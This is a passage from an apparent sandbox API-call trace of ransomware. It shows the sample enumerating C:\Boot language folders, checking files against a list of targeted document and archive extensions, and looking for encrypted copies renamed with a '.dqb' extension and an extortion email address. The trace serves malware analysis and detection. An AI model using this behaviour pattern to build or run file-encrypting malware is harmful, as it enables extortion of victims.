(lpString="C:\\Boot\\memtest.exe") returned 19 [0032.941] lstrlenW (lpString=".1cd") returned 4 [0032.941] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0032.941] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0032.941] lstrlenW (lpString=".jpg") returned 4 [0032.941] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0032.942] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0032.942] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0032.942] lstrlenW (lpString=".doc") returned 4 [0032.942] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0032.942] lstrlenW (lpString=".docx") returned 5 [0032.942] lstrcmpiW (lpString1=".docx", lpString2="t.exe") returned -1 [0032.942] lstrlenW (lpString=".pdf") returned 4 [0032.942] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0032.942] lstrlenW (lpString=".xls") returned 4 [0032.942] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0032.942] lstrlenW (lpString=".xlsx") returned 5 [0032.942] lstrcmpiW (lpString1=".xlsx", lpString2="t.exe") returned -1 [0032.942] lstrlenW (lpString=".ppt") returned 4 [0032.942] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0032.942] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0032.942] lstrlenW (lpString=".zip") returned 4 [0032.942] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0032.942] lstrlenW (lpString=".rar") returned 4 [0032.942] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0032.942] lstrlenW (lpString=".bz2") returned 4 [0032.942] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0032.942] lstrlenW (lpString=".7z") returned 3 [0032.942] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0032.942] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0032.942] lstrlenW (lpString=".dbf") returned 4 [0032.942] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0032.942] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0032.942] lstrlenW (lpString=".1cd") returned 4 [0032.942] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0032.942] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0032.942] lstrlenW (lpString=".jpg") returned 4 [0032.942] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0032.943] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0032.943] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0032.943] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0032.943] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=88144) returned 1 [0032.943] CloseHandle (hObject=0x17c) returned 1 [0032.943] GetFileAttributesW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui")) returned 0x20 [0032.943] GetFileAttributesW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.943] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.943] lstrlenW (lpString="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 29 [0032.943] lstrlenW (lpString="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 29 [0032.943] lstrlenW (lpString=".doc") returned 4 [0032.943] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0032.943] lstrlenW (lpString=".docx") returned 5 [0032.943] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0032.943] lstrlenW (lpString=".pdf") returned 4 [0032.943] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0032.943] lstrlenW (lpString=".xls") returned 4 [0032.943] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0032.943] lstrlenW (lpString=".xlsx") returned 5 [0032.943] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0032.943] lstrlenW (lpString=".ppt") returned 4 [0032.943] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0032.943] lstrlenW (lpString="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 29 [0032.944] lstrlenW (lpString=".zip") returned 4 [0032.944] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0032.944] lstrlenW (lpString=".rar") returned 4 [0032.944] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0032.944] lstrlenW (lpString=".bz2") returned 4 [0032.944] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0032.944] lstrlenW (lpString=".7z") returned 3 [0032.944] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0032.944] lstrlenW (lpString="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 29 [0032.944] lstrlenW (lpString=".dbf") returned 4 [0032.944] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0032.944] lstrlenW (lpString="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 29 [0032.944] lstrlenW (lpString=".1cd") returned 4 [0032.944] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0032.944] lstrlenW (lpString="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 29 [0032.944] lstrlenW (lpString=".jpg") returned 4 [0032.944] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0032.944] lstrlenW (lpString="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 29 [0032.944] lstrlenW (lpString="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 29 [0032.944] lstrlenW (lpString=".doc") returned 4 [0032.944] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0032.944] lstrlenW (lpString=".docx") returned 5 [0032.944] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0032.944] lstrlenW (lpString=".pdf") returned 4 [0032.944] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0032.944] lstrlenW (lpString=".xls") returned 4 [0032.944] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0032.944] lstrlenW (lpString=".xlsx") returned 5 [0032.944] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0032.944] lstrlenW (lpString=".ppt") returned 4 [0032.944] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0032.944] lstrlenW (lpString="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 29 [0032.944] lstrlenW (lpString=".zip") returned 4 [0032.944] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0032.944] lstrlenW (lpString=".rar") returned 4 [0032.945] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0032.945] lstrlenW (lpString=".bz2") returned 4 [0032.945] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0032.945] lstrlenW (lpString=".7z") returned 3 [0032.945] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0032.945] lstrlenW (lpString="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 29 [0032.945] lstrlenW (lpString=".dbf") returned 4 [0032.945] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0032.945] lstrlenW (lpString="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 29 [0032.945] lstrlenW (lpString=".1cd") returned 4 [0032.945] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0032.945] lstrlenW (lpString="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 29 [0032.945] lstrlenW (lpString=".jpg") returned 4 [0032.945] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0032.945] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0032.945] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0032.945] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0032.945] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=90704) returned 1 [0032.945] CloseHandle (hObject=0x17c) returned 1 [0032.945] GetFileAttributesW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui")) returned 0x20 [0032.945] GetFileAttributesW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.945] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.946] lstrlenW (lpString="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 29 [0032.946] lstrlenW (lpString="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 29 [0032.946] lstrlenW (lpString=".doc") returned 4 [0032.946] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0032.946] lstrlenW (lpString=".docx") returned 5 [0032.946] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0032.946] lstrlenW (lpString=".pdf") returned 4 [0032.946] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0032.946] lstrlenW (lpString=".xls") returned 4 [0032.946] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0032.946] lstrlenW (lpString=".xlsx") returned 5 [0032.946] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0032.946] lstrlenW (lpString=".ppt") returned 4 [0032.946] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0032.946] lstrlenW (lpString="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 29 [0032.946] lstrlenW (lpString=".zip") returned 4 [0032.946] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0032.946] lstrlenW (lpString=".rar") returned 4 [0032.946] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0032.946] lstrlenW (lpString=".bz2") returned 4 [0032.946] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0032.946] lstrlenW (lpString=".7z") returned 3 [0032.946] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0032.946] lstrlenW (lpString="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 29 [0032.946] lstrlenW (lpString=".dbf") returned 4 [0032.946] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0032.946] lstrlenW (lpString="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 29 [0032.946] lstrlenW (lpString=".1cd") returned 4 [0032.946] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0032.946] lstrlenW (lpString="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 29 [0032.946] lstrlenW (lpString=".jpg") returned 4 [0032.946] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0032.946] lstrlenW (lpString="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 29 [0032.947] lstrlenW (lpString="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 29 [0032.947] lstrlenW (lpString=".doc") returned 4 [0032.947] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0032.947] lstrlenW (lpString=".docx") returned 5 [0032.947] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0032.947] lstrlenW (lpString=".pdf") returned 4 [0032.947] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0032.947] lstrlenW (lpString=".xls") returned 4 [0032.947] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0032.947] lstrlenW (lpString=".xlsx") returned 5 [0032.947] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0032.947] lstrlenW (lpString=".ppt") returned 4 [0032.947] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0032.947] lstrlenW (lpString="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 29 [0032.947] lstrlenW (lpString=".zip") returned 4 [0032.947] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0032.947] lstrlenW (lpString=".rar") returned 4 [0032.947] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0032.947] lstrlenW (lpString=".bz2") returned 4 [0032.947] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0032.947] lstrlenW (lpString=".7z") returned 3 [0032.947] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0032.947] lstrlenW (lpString="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 29 [0032.947] lstrlenW (lpString=".dbf") returned 4 [0032.947] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0032.947] lstrlenW (lpString="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 29 [0032.947] lstrlenW (lpString=".1cd") returned 4 [0032.947] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0032.947] lstrlenW (lpString="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 29 [0032.947] lstrlenW (lpString=".jpg") returned 4 [0032.947] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0032.947] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0032.948] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0032.948] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0032.948] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=90704) returned 1 [0032.948] CloseHandle (hObject=0x17c) returned 1 [0032.948] GetFileAttributesW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui")) returned 0x20 [0032.948] GetFileAttributesW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.948] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.948] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0032.948] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0032.948] lstrlenW (lpString=".doc") returned 4 [0032.948] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0032.948] lstrlenW (lpString=".docx") returned 5 [0032.948] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0032.948] lstrlenW (lpString=".pdf") returned 4 [0032.948] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0032.948] lstrlenW (lpString=".xls") returned 4 [0032.948] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0032.949] lstrlenW (lpString=".xlsx") returned 5 [0032.949] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0032.949] lstrlenW (lpString=".ppt") returned 4 [0032.949] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0032.949] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0032.949] lstrlenW (lpString=".zip") returned 4 [0032.949] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0032.949] lstrlenW (lpString=".rar") returned 4 [0032.949] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0032.949] lstrlenW (lpString=".bz2") returned 4 [0032.949] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0032.949] lstrlenW (lpString=".7z") returned 3 [0032.949] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0032.949] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0032.949] lstrlenW (lpString=".dbf") returned 4 [0032.949] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0032.949] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0032.949] lstrlenW (lpString=".1cd") returned 4 [0032.949] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0032.949] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0032.949] lstrlenW (lpString=".jpg") returned 4 [0032.949] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0032.949] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0032.949] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0032.949] lstrlenW (lpString=".doc") returned 4 [0032.949] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0032.949] lstrlenW (lpString=".docx") returned 5 [0032.949] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0032.949] lstrlenW (lpString=".pdf") returned 4 [0032.949] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0032.949] lstrlenW (lpString=".xls") returned 4 [0032.950] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0032.950] lstrlenW (lpString=".xlsx") returned 5 [0032.950] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0032.950] lstrlenW (lpString=".ppt") returned 4 [0032.950] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0032.950] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0032.950] lstrlenW (lpString=".zip") returned 4 [0032.950] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0032.950] lstrlenW (lpString=".rar") returned 4 [0032.950] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0032.950] lstrlenW (lpString=".bz2") returned 4 [0032.950] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0032.950] lstrlenW (lpString=".7z") returned 3 [0032.950] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0032.950] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0032.950] lstrlenW (lpString=".dbf") returned 4 [0032.950] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0032.950] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0032.950] lstrlenW (lpString=".1cd") returned 4 [0032.950] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0032.950] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0032.950] lstrlenW (lpString=".jpg") returned 4 [0032.950] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0032.950] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0032.950] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0032.950] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0032.950] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=90176) returned 1 [0032.951] CloseHandle (hObject=0x17c) returned 1 [0032.951] GetFileAttributesW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui")) returned 0x20 [0032.951] GetFileAttributesW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.951] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.951] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0032.951] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0032.951] lstrlenW (lpString=".doc") returned 4 [0032.951] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0032.951] lstrlenW (lpString=".docx") returned 5 [0032.951] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0032.951] lstrlenW (lpString=".pdf") returned 4 [0032.951] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0032.951] lstrlenW (lpString=".xls") returned 4 [0032.951] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0032.951] lstrlenW (lpString=".xlsx") returned 5 [0032.951] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0032.951] lstrlenW (lpString=".ppt") returned 4 [0032.951] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0032.951] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0032.951] lstrlenW (lpString=".zip") returned 4 [0032.951] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0032.951] lstrlenW (lpString=".rar") returned 4 [0032.951] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0032.951] lstrlenW (lpString=".bz2") returned 4 [0032.951] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0032.951] lstrlenW (lpString=".7z") returned 3 [0032.951] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0032.951] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0032.951] lstrlenW (lpString=".dbf") returned 4 [0032.951] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0032.951] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0032.952] lstrlenW (lpString=".1cd") returned 4 [0032.952] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0032.952] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0032.952] lstrlenW (lpString=".jpg") returned 4 [0032.952] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0032.952] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0032.952] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0032.952] lstrlenW (lpString=".doc") returned 4 [0032.952] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0032.952] lstrlenW (lpString=".docx") returned 5 [0032.952] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0032.952] lstrlenW (lpString=".pdf") returned 4 [0032.952] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0032.952] lstrlenW (lpString=".xls") returned 4 [0032.952] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0032.952] lstrlenW (lpString=".xlsx") returned 5 [0032.952] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0032.952] lstrlenW (lpString=".ppt") returned 4 [0032.952] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0032.952] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0032.952] lstrlenW (lpString=".zip") returned 4 [0032.952] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0032.952] lstrlenW (lpString=".rar") returned 4 [0032.952] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0032.952] lstrlenW (lpString=".bz2") returned 4 [0032.952] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0032.952] lstrlenW (lpString=".7z") returned 3 [0032.952] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0032.952] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0032.952] lstrlenW (lpString=".dbf") returned 4 [0032.952] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0032.952] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0032.952] lstrlenW (lpString=".1cd") returned 4 [0032.952] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0032.952] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0032.953] lstrlenW (lpString=".jpg") returned 4 [0032.953] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0032.953] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0032.953] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0032.953] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0032.953] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=89664) returned 1 [0032.953] CloseHandle (hObject=0x17c) returned 1 [0032.953] GetFileAttributesW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui")) returned 0x20 [0032.953] GetFileAttributesW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.953] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.953] lstrlenW (lpString="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 29 [0032.953] lstrlenW (lpString="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 29 [0032.953] lstrlenW (lpString=".doc") returned 4 [0032.953] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0032.953] lstrlenW (lpString=".docx") returned 5 [0032.953] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0032.953] lstrlenW (lpString=".pdf") returned 4 [0032.953] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0032.953] lstrlenW (lpString=".xls") returned 4 [0032.953] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0032.953] lstrlenW (lpString=".xlsx") returned 5 [0032.954] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0032.954] lstrlenW (lpString=".ppt") returned 4 [0032.954] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0032.954] lstrlenW (lpString="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 29 [0032.954] lstrlenW (lpString=".zip") returned 4 [0032.954] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0032.954] lstrlenW (lpString=".rar") returned 4 [0032.954] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0032.954] lstrlenW (lpString=".bz2") returned 4 [0032.954] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0032.954] lstrlenW (lpString=".7z") returned 3 